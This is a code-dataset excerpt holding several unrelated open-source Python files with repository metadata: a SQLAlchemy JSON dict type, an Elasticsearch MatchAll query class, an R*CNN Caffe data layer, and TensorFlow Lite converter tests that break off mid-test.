self.__assert_callback()
|
Samnsparky/cdibase
|
prog_code/controller/enter_data_controllers_test.py
|
Python
|
gpl-3.0
| 28,902 | 0.001799 |
# $File: _ext_type.py
# $Date: Wed Feb 22 15:04:06 2012 +0800
#
# Copyright (C) 2012 the pynojo development team <see AUTHORS file>
#
# Contributors to this file:
# Kai Jia <jia.kai66@gmail.com>
#
# This file is part of pynojo
#
# pynojo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# pynojo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with pynojo. If not, see <http://www.gnu.org/licenses/>.
#
"""Extra SQLAlchemy ORM types"""
__all__ = ['JSONEncodeDict']
import cjson
from sqlalchemy.types import TypeDecorator, String
from sqlalchemy.ext.mutable import Mutable
from pynojo.exc import PynojoRuntimeError
class JSONEncodeDict(TypeDecorator):
"""Represents an mutable python *dict* as a json-encoded string."""
# pylint: disable=W0223
impl = String
def process_bind_param(self, value, dialect):
if value is not None:
value = cjson.encode(value)
if len(value) > self.length:
raise PynojoRuntimeError(_(
'{class_name}: encoded string too long',
class_name = self.__class__.__name__))
return value
def process_result_value(self, value, dialect):
if value is not None:
value = cjson.decode(value)
return value
class _JSONEncodeDictMutabilize(Mutable, dict):
@classmethod
def coerce(cls, key, value):
if not isinstance(value, _JSONEncodeDictMutabilize):
if isinstance(value, dict):
return _JSONEncodeDictMutabilize(value)
return Mutable.coerce(key, value)
else:
return value
def __setitem__(self, key, value):
dict.__setitem__(self, key, value)
self.changed()
def __delitem__(self, key):
dict.__delitem__(self, key)
self.changed()
_JSONEncodeDictMutabilize.associate_with(JSONEncodeDict)
|
zxytim/pynojo
|
pynojo/model/_ext_type.py
|
Python
|
gpl-3.0
| 2,330 | 0.003863 |
__author__ = 'Joe Linn'
from . import abstract
class MatchAll(abstract.AbstractQuery):
def __init__(self):
super(MatchAll, self).__init__()
self._params = {}
|
jlinn/pylastica
|
pylastica/query/matchall.py
|
Python
|
apache-2.0
| 180 | 0.005556 |
# --------------------------------------------------------
# Fast R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
# --------------------------------------------------------
# R*CNN
# Written by Georgia Gkioxari, 2015.
# See LICENSE in the project root for license information.
# --------------------------------------------------------
"""The data layer used during training to train a R*CNN network.
AttributesDataLayer implements a Caffe Python layer.
"""
import caffe
from fast_rcnn.config import cfg
from attr_data_layer.minibatch import get_minibatch
import numpy as np
import yaml
from multiprocessing import Process, Queue
# import pdb
class AttributesDataLayer(caffe.Layer):
"""R*CNN data layer used during training for attributes."""
def _shuffle_roidb_inds(self):
"""Randomly permute the training roidb."""
self._perm = np.random.permutation(np.arange(len(self._roidb)))
self._cur = 0
def _get_next_minibatch_inds(self):
"""Return the roidb indices for the next minibatch."""
if self._cur + cfg.TRAIN.IMS_PER_BATCH >= len(self._roidb):
self._shuffle_roidb_inds()
db_inds = self._perm[self._cur:self._cur + cfg.TRAIN.IMS_PER_BATCH]
self._cur += cfg.TRAIN.IMS_PER_BATCH
return db_inds
def _get_next_minibatch(self):
"""Return the blobs to be used for the next minibatch.
If cfg.TRAIN.USE_PREFETCH is True, then blobs will be computed in a
separate process and made available through self._blob_queue.
"""
if cfg.TRAIN.USE_PREFETCH:
return self._blob_queue.get()
else:
db_inds = self._get_next_minibatch_inds()
minibatch_db = [self._roidb[i] for i in db_inds]
return get_minibatch(minibatch_db, self._num_classes)
def set_roidb(self, roidb):
"""Set the roidb to be used by this layer during training."""
self._roidb = roidb
self._shuffle_roidb_inds()
if cfg.TRAIN.USE_PREFETCH:
self._blob_queue = Queue(10)
self._prefetch_process = BlobFetcher(self._blob_queue,
self._roidb,
self._num_classes)
self._prefetch_process.start()
# Terminate the child process when the parent exists
def cleanup():
print 'Terminating BlobFetcher'
self._prefetch_process.terminate()
self._prefetch_process.join()
import atexit
atexit.register(cleanup)
def setup(self, bottom, top):
"""Setup the RoIDataLayer."""
# parse the layer parameter string, which must be valid YAML
layer_params = yaml.load(self.param_str_)
self._num_classes = layer_params['num_classes']
self._name_to_top_map = {
'data': 0,
'rois': 1,
'labels': 2}
# data blob: holds a batch of N images, each with 3 channels
# The height and width (100 x 100) are dummy values
top[0].reshape(1, 3, 100, 100)
# rois blob: holds R regions of interest, each is a 5-tuple
# (n, x1, y1, x2, y2) specifying an image batch index n and a
# rectangle (x1, y1, x2, y2)
top[1].reshape(1, 5)
# labels blob: holds labels for each attribute
top[2].reshape(1, self._num_classes)
def forward(self, bottom, top):
"""Get blobs and copy them into this layer's top blob vector."""
blobs = self._get_next_minibatch()
for blob_name, blob in blobs.iteritems():
top_ind = self._name_to_top_map[blob_name]
# Reshape net's input blobs
top[top_ind].reshape(*(blob.shape))
# Copy data into net's input blobs
top[top_ind].data[...] = blob.astype(np.float32, copy=False)
def backward(self, top, propagate_down, bottom):
"""This layer does not propagate gradients."""
pass
def reshape(self, bottom, top):
"""Reshaping happens during the call to forward."""
pass
class BlobFetcher(Process):
"""Experimental class for prefetching blobs in a separate process."""
def __init__(self, queue, roidb, num_classes):
super(BlobFetcher, self).__init__()
self._queue = queue
self._roidb = roidb
self._num_classes = num_classes
self._perm = None
self._cur = 0
self._shuffle_roidb_inds()
# fix the random seed for reproducibility
np.random.seed(cfg.RNG_SEED)
def _shuffle_roidb_inds(self):
"""Randomly permute the training roidb."""
# TODO(rbg): remove duplicated code
self._perm = np.random.permutation(np.arange(len(self._roidb)))
self._cur = 0
def _get_next_minibatch_inds(self):
"""Return the roidb indices for the next minibatch."""
# TODO(rbg): remove duplicated code
if self._cur + cfg.TRAIN.IMS_PER_BATCH >= len(self._roidb):
self._shuffle_roidb_inds()
db_inds = self._perm[self._cur:self._cur + cfg.TRAIN.IMS_PER_BATCH]
self._cur += cfg.TRAIN.IMS_PER_BATCH
return db_inds
def run(self):
print 'BlobFetcher started'
while True:
db_inds = self._get_next_minibatch_inds()
minibatch_db = [self._roidb[i] for i in db_inds]
blobs = get_minibatch(minibatch_db, self._num_classes)
self._queue.put(blobs)
|
gkioxari/RstarCNN
|
lib/attr_data_layer/layer.py
|
Python
|
bsd-2-clause
| 5,647 | 0.000708 |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for lite.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tempfile
import numpy as np
from tensorflow.contrib.lite.python import lite
from tensorflow.contrib.lite.python import lite_constants
from tensorflow.contrib.lite.python.interpreter import Interpreter
from tensorflow.python import keras
from tensorflow.python.client import session
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops.variables import global_variables_initializer as _global_variables_initializer
from tensorflow.python.platform import gfile
from tensorflow.python.platform import resource_loader
from tensorflow.python.platform import test
from tensorflow.python.saved_model import saved_model
from tensorflow.python.training.training_util import write_graph
class FromConstructor(test_util.TensorFlowTestCase):
# Tests invalid constructors using a dummy value for the GraphDef.
def testInvalidConstructor(self):
message = ('If input_tensors and output_tensors are None, both '
'input_arrays_with_shape and output_arrays must be defined.')
# `output_arrays` is not defined.
with self.assertRaises(ValueError) as error:
lite.TocoConverter(
None, None, [], input_arrays_with_shape=[('input', [3, 9])])
self.assertEqual(message, str(error.exception))
# `input_arrays_with_shape` is not defined.
with self.assertRaises(ValueError) as error:
lite.TocoConverter(None, [], None, output_arrays=['output'])
self.assertEqual(message, str(error.exception))
# Tests valid constructors using a dummy value for the GraphDef.
def testValidConstructor(self):
converter = lite.TocoConverter(
None,
None,
None,
input_arrays_with_shape=[('input', [3, 9])],
output_arrays=['output'])
self.assertFalse(converter._has_valid_tensors())
self.assertEqual(converter.get_input_arrays(), ['input'])
with self.assertRaises(ValueError) as error:
converter._set_batch_size(1)
self.assertEqual(
'The batch size cannot be set for this model. Please use '
'input_shapes parameter.', str(error.exception))
converter = lite.TocoConverter(None, ['input_tensor'], ['output_tensor'])
self.assertTrue(converter._has_valid_tensors())
class FromSessionTest(test_util.TensorFlowTestCase):
def testFloat(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
out_tensor = in_tensor + in_tensor
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('Placeholder', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
def testQuantization(self):
in_tensor_1 = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32, name='inputA')
in_tensor_2 = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32, name='inputB')
out_tensor = array_ops.fake_quant_with_min_max_args(
in_tensor_1 + in_tensor_2, min=0., max=1., name='output')
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(
sess, [in_tensor_1, in_tensor_2], [out_tensor])
converter.inference_type = lite_constants.QUANTIZED_UINT8
converter.quantized_input_stats = {
'inputA': (0., 1.),
'inputB': (0., 1.)
} # mean, std_dev
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(2, len(input_details))
self.assertEqual('inputA', input_details[0]['name'])
self.assertEqual(np.uint8, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((1., 0.),
input_details[0]['quantization']) # scale, zero_point
self.assertEqual('inputB', input_details[1]['name'])
self.assertEqual(np.uint8, input_details[1]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[1]['shape']).all())
self.assertEqual((1., 0.),
input_details[1]['quantization']) # scale, zero_point
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('output', output_details[0]['name'])
self.assertEqual(np.uint8, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertTrue(output_details[0]['quantization'][0] > 0) # scale
def testQuantizationInvalid(self):
in_tensor_1 = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32, name='inputA')
in_tensor_2 = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32, name='inputB')
out_tensor = array_ops.fake_quant_with_min_max_args(
in_tensor_1 + in_tensor_2, min=0., max=1., name='output')
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(
sess, [in_tensor_1, in_tensor_2], [out_tensor])
converter.inference_type = lite_constants.QUANTIZED_UINT8
converter.quantized_input_stats = {'inputA': (0., 1.)} # mean, std_dev
with self.assertRaises(ValueError) as error:
converter.convert()
self.assertEqual(
'Quantization input stats are not available for input tensors '
'\'inputB\'.', str(error.exception))
def testSizeNoneInvalid(self):
in_tensor = array_ops.placeholder(dtype=dtypes.float32)
out_tensor = in_tensor + in_tensor
sess = session.Session()
# Test invalid shape. None after 1st dimension.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
with self.assertRaises(ValueError) as error:
converter.convert()
self.assertEqual('Provide an input shape for input array \'Placeholder\'.',
str(error.exception))
def testBatchSizeInvalid(self):
in_tensor = array_ops.placeholder(
shape=[1, None, 16, 3], dtype=dtypes.float32)
out_tensor = in_tensor + in_tensor
sess = session.Session()
# Test invalid shape. None after 1st dimension.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
with self.assertRaises(ValueError) as error:
converter.convert()
self.assertEqual(
'None is only supported in the 1st dimension. Tensor '
'\'Placeholder\' has invalid shape \'[1, None, 16, 3]\'.',
str(error.exception))
def testBatchSizeValid(self):
in_tensor = array_ops.placeholder(
shape=[None, 16, 16, 3], dtype=dtypes.float32)
out_tensor = in_tensor + in_tensor
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('Placeholder', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
def testFreezeGraph(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
var = variable_scope.get_variable(
'weights', shape=[1, 16, 16, 3], dtype=dtypes.float32)
out_tensor = in_tensor + var
sess = session.Session()
sess.run(_global_variables_initializer())
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('Placeholder', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
# TODO(nupurgarg): Verify value of contents in GraphViz.
def testGraphviz(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
out_tensor = in_tensor + in_tensor
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
converter.output_format = lite_constants.GRAPHVIZ_DOT
graphviz_output = converter.convert()
self.assertTrue(graphviz_output)
# TODO(nupurgarg): Verify value of contents in GraphViz.
def testDumpGraphviz(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
out_tensor = in_tensor + in_tensor
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
graphviz_dir = self.get_temp_dir()
converter.dump_graphviz_dir = graphviz_dir
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Ensure interpreter is able to allocate and check graphviz data.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
num_items_graphviz = len(os.listdir(graphviz_dir))
self.assertTrue(num_items_graphviz)
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
graphviz_dir = self.get_temp_dir()
converter.dump_graphviz_dir = graphviz_dir
converter.dump_graphviz_video = True
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Ensure graphviz folder has more data after using video flag.
num_items_graphviz_video = len(os.listdir(graphviz_dir))
self.assertTrue(num_items_graphviz_video > num_items_graphviz)
def testInferenceInputType(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
out_tensor = in_tensor + in_tensor
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
converter.inference_input_type = lite_constants.QUANTIZED_UINT8
converter.quantized_input_stats = {'Placeholder': (0., 1.)} # mean, std_dev
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('Placeholder', input_details[0]['name'])
self.assertEqual(np.uint8, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((1., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
def testDefaultRangesStats(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
out_tensor = in_tensor + in_tensor
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
converter.inference_type = lite_constants.QUANTIZED_UINT8
converter.quantized_input_stats = {'Placeholder': (0., 1.)} # mean, std_dev
converter.default_ranges_stats = (0, 6) # min, max
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('Placeholder', input_details[0]['name'])
self.assertEqual(np.uint8, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((1., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.uint8, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertTrue(output_details[0]['quantization'][0] > 0) # scale
def testPostTrainingQuantize(self):
np.random.seed(0)
# We need the tensor to have more than 1024 elements for quantize_weights
# to kick in. Thus, the [33, 33] shape.
in_tensor_1 = array_ops.placeholder(
shape=[33, 33], dtype=dtypes.float32, name='inputA')
in_tensor_2 = constant_op.constant(
np.random.uniform(low=-10., high=10., size=(33, 33)),
shape=[33, 33],
dtype=dtypes.float32,
name='inputB')
out_tensor = math_ops.matmul(in_tensor_1, in_tensor_2, name='output')
sess = session.Session()
# Convert float model.
float_converter = lite.TocoConverter.from_session(sess, [in_tensor_1],
[out_tensor])
float_tflite = float_converter.convert()
self.assertTrue(float_tflite)
# Convert quantized weights model.
quantized_converter = lite.TocoConverter.from_session(
sess, [in_tensor_1], [out_tensor])
quantized_converter.post_training_quantize = True
quantized_tflite = quantized_converter.convert()
self.assertTrue(quantized_tflite)
# Ensure that the quantized weights tflite model is smaller.
self.assertTrue(len(quantized_tflite) < len(float_tflite))
def testExtendedMode(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
out_tensor = in_tensor + in_tensor
sess = session.Session()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_session(sess, [in_tensor], [out_tensor])
converter.converter_mode = lite.ConverterMode.TOCO_EXTENDED_ALL
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Ensures the model contains TensorFlow ops.
# TODO(nupurgarg): Check values once there is a Python delegate interface.
interpreter = Interpreter(model_content=tflite_model)
with self.assertRaises(RuntimeError) as error:
interpreter.allocate_tensors()
self.assertIn(
'Regular TensorFlow ops are not supported by this interpreter. Make '
'sure you invoke the Eager delegate before inference.',
str(error.exception))
class FromFrozenGraphFile(test_util.TensorFlowTestCase):
def testFloat(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
_ = in_tensor + in_tensor
sess = session.Session()
# Write graph to file.
graph_def_file = os.path.join(self.get_temp_dir(), 'model.pb')
write_graph(sess.graph_def, '', graph_def_file, False)
sess.close()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_frozen_graph(graph_def_file,
['Placeholder'], ['add'])
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('Placeholder', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
def testFloatWithShapesArray(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
_ = in_tensor + in_tensor
sess = session.Session()
# Write graph to file.
graph_def_file = os.path.join(self.get_temp_dir(), 'model.pb')
write_graph(sess.graph_def, '', graph_def_file, False)
sess.close()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_frozen_graph(
graph_def_file, ['Placeholder'], ['add'],
input_shapes={'Placeholder': [1, 16, 16, 3]})
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
def testFreezeGraph(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
var = variable_scope.get_variable(
'weights', shape=[1, 16, 16, 3], dtype=dtypes.float32)
_ = in_tensor + var
sess = session.Session()
# Write graph to file.
graph_def_file = os.path.join(self.get_temp_dir(), 'model.pb')
write_graph(sess.graph_def, '', graph_def_file, False)
sess.close()
# Ensure the graph with variables cannot be converted.
with self.assertRaises(ValueError) as error:
lite.TocoConverter.from_frozen_graph(graph_def_file, ['Placeholder'],
['add'])
self.assertEqual('Please freeze the graph using freeze_graph.py.',
str(error.exception))
def testPbtxt(self):
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
_ = in_tensor + in_tensor
sess = session.Session()
# Write graph to file.
graph_def_file = os.path.join(self.get_temp_dir(), 'model.pbtxt')
write_graph(sess.graph_def, '', graph_def_file, True)
sess.close()
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_frozen_graph(graph_def_file,
['Placeholder'], ['add'])
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('Placeholder', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
def testInvalidFileNotFound(self):
with self.assertRaises(IOError) as error:
lite.TocoConverter.from_frozen_graph('invalid_file', ['Placeholder'],
['add'])
self.assertEqual('File \'invalid_file\' does not exist.',
str(error.exception))
def testInvalidFileBadData(self):
graph_def_file = os.path.join(self.get_temp_dir(), 'invalid_file')
with gfile.Open(graph_def_file, 'wb') as temp_file:
temp_file.write('bad data')
temp_file.flush()
# Attempts to convert the invalid model.
with self.assertRaises(IOError) as error:
lite.TocoConverter.from_frozen_graph(graph_def_file, ['Placeholder'],
['add'])
self.assertEqual(
'Unable to parse input file \'{}\'.'.format(graph_def_file),
str(error.exception))
# TODO(nupurgarg): Test model loading in open source.
def _initObjectDetectionArgs(self):
# Initializes the arguments required for the object detection model.
self._graph_def_file = resource_loader.get_path_to_datafile(
'testdata/tflite_graph.pb')
self._input_arrays = ['normalized_input_image_tensor']
self._output_arrays = [
'TFLite_Detection_PostProcess', 'TFLite_Detection_PostProcess:1',
'TFLite_Detection_PostProcess:2', 'TFLite_Detection_PostProcess:3'
]
self._input_shapes = {'normalized_input_image_tensor': [1, 300, 300, 3]}
def testTFLiteGraphDef(self):
# Tests the object detection model that cannot be loaded in TensorFlow.
self._initObjectDetectionArgs()
converter = lite.TocoConverter.from_frozen_graph(
self._graph_def_file, self._input_arrays, self._output_arrays,
self._input_shapes)
converter.allow_custom_ops = True
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('normalized_input_image_tensor', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 300, 300, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(4, len(output_details))
self.assertEqual('TFLite_Detection_PostProcess', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 10, 4] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
self.assertEqual('TFLite_Detection_PostProcess:1',
output_details[1]['name'])
self.assertTrue(([1, 10] == output_details[1]['shape']).all())
self.assertEqual('TFLite_Detection_PostProcess:2',
output_details[2]['name'])
self.assertTrue(([1, 10] == output_details[2]['shape']).all())
self.assertEqual('TFLite_Detection_PostProcess:3',
output_details[3]['name'])
self.assertTrue(([1] == output_details[3]['shape']).all())
def testTFLiteGraphDefMissingShape(self):
# Tests invalid cases for the model that cannot be loaded in TensorFlow.
self._initObjectDetectionArgs()
# Missing `input_shapes`.
with self.assertRaises(ValueError) as error:
lite.TocoConverter.from_frozen_graph(
self._graph_def_file, self._input_arrays, self._output_arrays)
self.assertEqual('input_shapes must be defined for this model.',
str(error.exception))
def testTFLiteGraphDefInvalidShape(self):
# Tests invalid cases for the model that cannot be loaded in TensorFlow.
self._initObjectDetectionArgs()
# `input_shapes` does not contain the names in `input_arrays`.
with self.assertRaises(ValueError) as error:
lite.TocoConverter.from_frozen_graph(
self._graph_def_file,
self._input_arrays,
self._output_arrays,
input_shapes={'invalid-value': [1, 19]})
self.assertEqual(
'input_shapes must contain a value for each item in input_array.',
str(error.exception))
class FromSavedModelTest(test_util.TensorFlowTestCase):
def _createSavedModel(self, shape):
"""Create a simple SavedModel."""
saved_model_dir = os.path.join(self.get_temp_dir(), 'simple_savedmodel')
with session.Session() as sess:
in_tensor_1 = array_ops.placeholder(
shape=shape, dtype=dtypes.float32, name='inputB')
in_tensor_2 = array_ops.placeholder(
shape=shape, dtype=dtypes.float32, name='inputA')
out_tensor = in_tensor_1 + in_tensor_2
inputs = {'x': in_tensor_1, 'y': in_tensor_2}
outputs = {'z': out_tensor}
saved_model.simple_save(sess, saved_model_dir, inputs, outputs)
return saved_model_dir
def testSimpleModel(self):
"""Test a SavedModel."""
saved_model_dir = self._createSavedModel(shape=[1, 16, 16, 3])
# Convert model and ensure model is not None.
converter = lite.TocoConverter.from_saved_model(saved_model_dir)
tflite_model = converter.convert()
self.assertTrue(tflite_model)
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(2, len(input_details))
self.assertEqual('inputA', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
self.assertEqual('inputB', input_details[1]['name'])
self.assertEqual(np.float32, input_details[1]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[1]['shape']).all())
self.assertEqual((0., 0.), input_details[1]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
def testNoneBatchSize(self):
"""Test a SavedModel, with None in input tensor's shape."""
saved_model_dir = self._createSavedModel(shape=[None, 16, 16, 3])
converter = lite.TocoConverter.from_saved_model(saved_model_dir)
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(2, len(input_details))
self.assertEqual('inputA', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
